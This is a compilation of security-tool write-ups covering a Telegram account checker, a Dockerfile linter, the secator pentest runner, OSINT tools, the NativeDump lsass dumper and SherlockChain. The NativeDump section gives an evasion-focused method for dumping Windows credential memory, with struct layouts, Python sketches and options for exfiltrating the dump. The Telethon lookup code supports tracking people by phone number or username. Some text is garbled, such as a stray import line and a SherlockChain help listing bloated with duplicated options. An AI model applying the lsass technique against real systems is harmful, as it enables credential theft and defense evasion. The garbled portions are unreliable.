
Telegram-Checker - A Python Tool For Checking Telegram Accounts Via Phone Numbers Or Usernames

By: Unknown


Enhanced version of bellingcat's Telegram Phone Checker!

A Python script to check Telegram accounts using phone numbers or usernames.


✨ Features

  • πŸ” Check single or multiple phone numbers and usernames
  • πŸ“ Import numbers from text file
  • πŸ“Έ Auto-download profile pictures
  • πŸ’Ύ Save results as JSON
  • πŸ” Secure credential storage
  • πŸ“Š Detailed user information

πŸš€ Installation

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-checker.git
cd telegram-checker
  2. Install required packages:
pip install -r requirements.txt

πŸ“¦ Requirements

Contents of requirements.txt:

telethon
rich
click
python-dotenv

Or install packages individually:

pip install telethon rich click python-dotenv

βš™οΈ Configuration

On first run, the script will ask for:

  • Telegram API credentials (get them from https://my.telegram.org/apps)
  • Your Telegram phone number, including the country code (with +)
  • A verification code (sent to your Telegram)
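
Under the hood, checks like this are commonly built on Telethon (which requirements.txt pulls in). Here is a minimal sketch of a username lookup, separate from this tool's own code; the credential values and username are placeholders:

import struct  # not needed here; see below for the actual imports
from telethon.sync import TelegramClient

api_id = 123456          # placeholder: your API ID from my.telegram.org/apps
api_hash = "0123abcd"    # placeholder: your API hash

with TelegramClient("session", api_id, api_hash) as client:
    # get_entity resolves a username to a full user object
    user = client.get_entity("some_username")  # placeholder username
    print(user.id, user.username, user.first_name)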

πŸ’» Usage

Run the script:

python telegram_checker.py

Choose from the options:

  1. Check phone numbers from input
  2. Check phone numbers from file
  3. Check usernames from input
  4. Check usernames from file
  5. Clear saved credentials
  6. Exit

πŸ“‚ Output

Results are saved in:

  • results/ - JSON files with detailed information
  • profile_photos/ - Downloaded profile pictures

⚠️ Note

This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.

πŸ“„ License

MIT License



Docf-Sec-Check - DockF-Sec-Check Helps To Make Your Dockerfile Commands More Secure

By: Unknown


DockF-Sec-Check helps to make your Dockerfile commands more secure.


Done

  • [x] First-level security notification in the Dockerfile

TODO List

  • [ ] Correctly detect the Dockerfile.
  • [ ] Second-level security notification in the Dockerfile.
  • [ ] Security notification in Docker images.
  • [ ] ***** (Private Repository)

Installation

From Source Code

You can use virtualenv for package dependencies before installation.

git clone https://github.com/OsmanKandemir/docf-sec-check.git
cd docf-sec-check
python setup.py build
python setup.py install

From Pypi

The application is available on PyPI. To install with pip:

pip install docfseccheck

From Dockerfile

You can run this application in a container after building the image from the Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to the Dockerfile you want to scan on your local machine.

docker build -t docfseccheck .
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile

From DockerHub

docker pull osmankandemir/docfseccheck:v1.0
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile


Usage

-f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE]
                        Dockerfile path, e.g. --file Dockerfile

Function Usage

from docfchecker import DocFChecker

# "Dockerfile" is the path of the Dockerfile to check.
DocFChecker(["Dockerfile"])

Development and Contribution

See; CONTRIBUTING.md

License

Copyright (c) 2024 Osman Kandemir. Licensed under the GPL-3.0 License.

Donations

If you like DocF-Sec-Check and would like to show support, you can use Buy A Coffee or the GitHub Sponsors feature for the developer using the buttons below.

Or

Sponsor me : https://github.com/sponsors/OsmanKandemir 😊

Your support will be much appreciated😊



Secator - The Pentester's Swiss Knife

By: Unknown


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Scales from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install the languages those tools are written in, assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator ships with a minimal set of dependencies by default.

There are several addons available for secator:

worker Add support for Celery workers (see Distributed runs with Celery: https://docs.freelabz.com/in-depth/distributed-runs-with-celery).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

And more... To list all the tasks / workflows / scans you can use:

secator x --help
secator w --help
secator s --help
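
If you prefer driving secator from a script, a minimal sketch is to shell out to the CLI shown above and capture its console output; this assumes only the documented command line, not any Python API:

import subprocess

# Run the ffuf task example from above and capture what it prints.
result = subprocess.run(
    ["secator", "x", "ffuf", "http://testphp.vulnweb.com/FUZZ"],
    capture_output=True, text=True, check=False,
)
print(result.stdout)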

Learn more

To go deeper with secator, check out:

  • Our complete documentation
  • Our getting started tutorial video
  • Our Medium post
  • Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



Ashok - An OSINT Recon Tool, A.K.A. Swiss Army Knife

By: Unknown


Reconnaissance is the first phase of penetration testing: gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, designed specifically for the reconnaissance phase. Ashok-v1.1 adds an advanced Google dorker and a Wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

An index of some options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Unknown


    NativeDump allows dumping the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams). It relies on the following native calls:


    • NtOpenProcessToken and NtAdjustPrivilegesToken to get the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp".

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoint, CrowdStrike...) and is currently undetected. However, it does not work if PPL is enabled on the system.

    Some benefits of this technique are:

    • It does not use the well-known dbghelp!MinidumpWriteDump function
    • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
    • The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading up on the Minidump format's undocumented structures, the file layout can be summed up as:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-byte structure which can be defined in C# as:

    public struct MinidumpHeader
    {
        public uint Signature;
        public ushort Version;
        public ushort ImplementationVersion;
        public ushort NumberOfStreams;
        public uint StreamDirectoryRva;
        public uint CheckSum;
        public IntPtr TimeDateStamp;
    }

    The required values are:

    • Signature: Fixed value 0x504D444D (the "MDMP" string)
    • Version: Fixed value 0xA793 (the Microsoft constant MINIDUMP_VERSION)
    • NumberOfStreams: Fixed value 3, the three streams required for the file
    • StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
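
    For illustration, the 32-byte header can be packed with Python's struct module. This is a sketch of the on-disk layout (little-endian: Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp as 32-bit fields, plus a 64-bit Flags field), using the fixed values above:

    import struct

    header = struct.pack(
        "<IIIIIIQ",
        0x504D444D,  # Signature: "MDMP"
        0xA793,      # Version: MINIDUMP_VERSION
        3,           # NumberOfStreams: SystemInfo, ModuleList, Memory64List
        0x20,        # StreamDirectoryRva: directory starts right after the header
        0,           # CheckSum: not required for parsing
        0,           # TimeDateStamp: not required for parsing
        0,           # Flags
    )
    assert len(header) == 32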


    B. Stream Directory

    Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
        public uint StreamType;
        public uint Size;
        public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream
    0x16 ProcessVmCountersStream
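
    Continuing the Python sketch, the Stream Directory for this file is three 12-byte (StreamType, Size, Location) entries; the IDs come from the table above, and the offsets and sizes are derived in the following sections:

    import struct

    entries = [
        (0x07, 56,  0x44),   # SystemInfoStream at offset 68
        (0x04, 112, 0x7C),   # ModuleListStream at offset 124
        (0x09, 0,   0x12A),  # Memory64ListStream; size depends on the region count
    ]
    directory = b"".join(struct.pack("<III", t, s, loc) for t, s, loc in entries)
    assert len(directory) == 36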

    C. SystemInformation Stream

    The first stream is the SystemInformation stream, with ID 7. Its size is 56 bytes and it is located at offset 68 (0x44), right after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
        public ushort ProcessorArchitecture;
        public ushort ProcessorLevel;
        public ushort ProcessorRevision;
        public byte NumberOfProcessors;
        public byte ProductType;
        public uint MajorVersion;
        public uint MinorVersion;
        public uint BuildNumber;
        public uint PlatformId;
        public uint UnknownField1;
        public uint UnknownField2;
        public IntPtr ProcessorFeatures;
        public IntPtr ProcessorFeatures2;
        public uint UnknownField3;
        public ushort UnknownField14;
        public byte UnknownField15;
    }

    The required values are:

    • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
    • MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


    D. ModuleList Stream

    The second stream is the ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size of 112 bytes, since it contains the entry for a single module, the only one needed for parsing to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries, followed by a 108-byte entry for each module:

    public struct ModuleListStream
    {
        public uint NumberOfModules;
        public ModuleInfo[] Modules;
    }

    As there is only one module, it gets simplified to:

    public struct ModuleListStream
    {
        public uint NumberOfModules;
        public IntPtr BaseAddress;
        public uint Size;
        public uint UnknownField1;
        public uint Timestamp;
        public uint PointerName;
        public IntPtr UnknownField2;
        public IntPtr UnknownField3;
        public IntPtr UnknownField4;
        public IntPtr UnknownField5;
        public IntPtr UnknownField6;
        public IntPtr UnknownField7;
        public IntPtr UnknownField8;
        public IntPtr UnknownField9;
        public IntPtr UnknownField10;
        public IntPtr UnknownField11;
    }

    The required values are:

    • NumberOfModules: Fixed value 1
    • BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
    • Size: Obtained by adding all memory region sizes from BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of another library
    • PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


    E. Memory64List Stream

    The third stream is the Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

    public struct Memory64ListStream
    {
        public ulong NumberOfEntries;
        public uint MemoryRegionsBaseAddress;
        public Memory64Info[] MemoryInfoEntries;
    }

    Each memory region entry is a 16-byte structure:

    public struct Memory64Info
    {
        public IntPtr Address;
        public IntPtr Size;
    }

    The required values are:

    • NumberOfEntries: Number of memory regions, obtained after looping through them
    • MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding up the sizes of all 16-byte memory entries
    • Address and Size: Obtained for each valid region while looping through them


    F. Looping memory regions

    There are prerequisites for looping through the memory regions of the lsass.exe process, which can be met using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
    2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

    With this, it is possible to traverse process memory by calling:

    • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
    • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning the region is accessible and committed, its base address and size populate one entry of the Memory64List stream and its bytes can be added to the file
    • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
    • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
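
    A rough Python/ctypes model of that loop, using the Win32 equivalents VirtualQueryEx and ReadProcessMemory rather than the NTAPIs NativeDump actually calls:

    import ctypes
    from ctypes import wintypes

    PAGE_NOACCESS = 0x01
    MEM_COMMIT = 0x1000

    class MEMORY_BASIC_INFORMATION(ctypes.Structure):
        _fields_ = [
            ("BaseAddress", ctypes.c_void_p),
            ("AllocationBase", ctypes.c_void_p),
            ("AllocationProtect", wintypes.DWORD),
            ("PartitionId", wintypes.WORD),
            ("RegionSize", ctypes.c_size_t),
            ("State", wintypes.DWORD),
            ("Protect", wintypes.DWORD),
            ("Type", wintypes.DWORD),
        ]

    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

    def walk_regions(hprocess):
        """Yield (address, size, bytes) for each committed, readable region."""
        mbi = MEMORY_BASIC_INFORMATION()
        address = 0
        while kernel32.VirtualQueryEx(hprocess, ctypes.c_void_p(address),
                                      ctypes.byref(mbi), ctypes.sizeof(mbi)):
            if mbi.State == MEM_COMMIT and mbi.Protect != PAGE_NOACCESS:
                buf = (ctypes.c_char * mbi.RegionSize)()
                read = ctypes.c_size_t(0)
                if kernel32.ReadProcessMemory(hprocess, ctypes.c_void_p(address),
                                              buf, mbi.RegionSize, ctypes.byref(read)):
                    yield address, mbi.RegionSize, buf.raw[:read.value]
            address += mbi.RegionSize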


    G. Creating Minidump file

    After the previous steps, we have everything necessary to create the Minidump file. We can create the file locally or send the bytes to a remote machine, optionally encoding or encrypting them first. Some of these possibilities are implemented in the delegates branch, where the file created locally can be XOR-encoded, and in the remote branch, where the file can be XOR-encoded before being sent to a remote machine.




    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Unknown



    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

    The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    1. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
    2. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    3. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    4. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    5. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    6. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium

    Detectors

    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
